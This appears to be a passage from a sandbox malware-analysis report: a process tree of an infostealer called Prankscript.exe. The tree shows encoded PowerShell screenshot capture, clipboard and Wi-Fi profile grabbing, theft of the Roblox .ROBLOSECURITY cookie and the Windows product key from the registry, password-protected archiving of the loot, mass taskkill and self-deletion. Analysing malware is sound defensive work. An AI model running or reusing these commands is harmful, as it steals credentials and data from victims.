    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5220
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5276
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5332
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5428
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6752
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ns2ydoyw\ns2ydoyw.cmdline"
        6⤵
        
        PID:5700
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3302.tmp" "c:\Users\Admin\AppData\Local\Temp\ns2ydoyw\CSC8BFE3C0B6CD246BC9C421F61126394C.TMP"
        7⤵
        
        PID:5940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6928
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7080
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7152
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5772
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5936
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"
      4⤵
      PID:6124
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3948
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1920"
      4⤵
      PID:6944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1920
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4472"
      4⤵
      PID:5332
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4472
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"
      4⤵
      PID:6968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2092
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:7080
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5116"
      4⤵
      PID:5792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5116
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2568"
      4⤵
      PID:5696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2568
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2040"
      4⤵
      PID:3688
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2040
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 724"
      4⤵
      PID:5464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 724
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2612"
      4⤵
      PID:5636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2612
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3816"
      4⤵
      PID:6280
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3816
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4336"
      4⤵
      PID:6452
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4336
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:3104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29802\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\uXQsB.zip" *"
      4⤵
      PID:6564
    - - C:\Users\Admin\AppData\Local\Temp\_MEI29802\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI29802\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\uXQsB.zip" *
        5⤵
        Executes dropped EXE
        
        PID:6224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5828
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6744
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6948
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:3336
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\Prankscript.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4428
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3956
- C:\Users\Admin\Downloads\Prankscript.exe
  "C:\Users\Admin\Downloads\Prankscript.exe"
  2⤵
  - Executes dropped EXE
  PID:668
- - C:\Users\Admin\Downloads\Prankscript.exe
    "C:\Users\Admin\Downloads\Prankscript.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1708

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x524 0x51c
1⤵
PID:3852

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2528

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd4882cc40,0x7ffd4882cc4c,0x7ffd4882cc58
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1856 /prefetch:2
  2⤵
  PID:6564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  PID:5188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2484 /prefetch:8
  2⤵
  PID:6868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3124,i,1680138436458918897,2295801146514113925,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3720 /prefetch:1
  2⤵
  PID:4560

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

